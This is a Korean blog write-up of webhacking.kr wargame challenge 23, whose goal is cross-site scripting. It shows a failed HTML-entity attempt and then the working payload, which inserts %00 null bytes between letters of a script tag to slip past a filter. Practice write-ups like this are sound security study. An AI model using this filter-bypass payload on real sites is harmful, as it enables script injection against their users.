vared
vared - Blog
vared
전체 방문자
오늘
어제
  • 분류 전체보기 (138)
    • Study (0)
    • Project (0)
    • Paper Review (0)
    • Tool (0)
    • WriteUp (124)
      • Root-me.org (44)
      • LOS_rubiya (32)
      • Webhacking.kr (21)
      • DreamHack (9)
      • XCZ.kr (8)
      • HackCTF (10)
    • Miscellaneous (0)
    • Forensic-CheatSheet (10)

블로그 메뉴

  • Category

공지사항

  • Forensic-CheatSheet 오픈

인기 글

태그

  • digital-forensics
  • Digital-Forensic
  • Thumbcache
  • sql injection
  • Windows Artifact
  • shellbag
  • trim
  • iconcahce
  • JavaScript
  • Los
  • LNK FIile
  • Artifacts
  • Digital Forensic
  • File Execution
  • ssd
  • forensic artifacts
  • shellbag forensics
  • webhacking.kr
  • forensic-cheatsheet

최근 댓글

최근 글

티스토리

hELLO · Designed By 정상우.
vared

vared - Blog

webhacking.kr : challenge 23
WriteUp/Webhacking.kr

webhacking.kr : challenge 23

2020. 9. 11. 22:55

Your mission is to inject <script>alert(1);</script>

 

이게 궁극적 목표다

 

 

일단 제출 칸의 값의 이름은 code다.

 

필터링 목록이 없다.

 

알파벳을 연속되게 해주면 필터링하는거같다.

일단 html로 인코딩해서 넣어주었다.

&#x59;&#x6f;&#x75;&#x72;&#x20;&#x6d;&#x69;&#x73;&#x73;&#x69;&#x6f;&#x6e;&#x20;&#x69;&#x73;&#x20;&#x74;&#x6f;&#x20;&#x69;&#x6e;&#x6a;&#x65;&#x63;&#x74;&#x20;&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3b;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x0a;

 

이렇게 들어갔는데 왜 안되누

일단 이게 코드값으로 들어가서 안되는거같다.

이걸 실행으로 해주려면 ..

문자 사이사이에 NULL문자를 넣어주면 된다.

그러면 필터링에 안걸리니까

?code=<s%00c%00r%00i%00p%00t>a%00l%00e%00r%00t%00(1);</s%00c%00r%00i%00p%00t>

저작자표시 (새창열림)

'WriteUp > Webhacking.kr' 카테고리의 다른 글

webhacking.kr : challenge 25  (0) 2020.09.11
webhacking.kr : challenge 24  (0) 2020.09.11
webhacking.kr : challenge 22  (0) 2020.09.11
webhacking.kr : challenge 21  (0) 2020.09.11
webhacking.kr : challenge 20  (0) 2020.09.11
    'WriteUp/Webhacking.kr' 카테고리의 다른 글
    • webhacking.kr : challenge 25
    • webhacking.kr : challenge 24
    • webhacking.kr : challenge 22
    • webhacking.kr : challenge 21
    vared
    vared

    티스토리툴바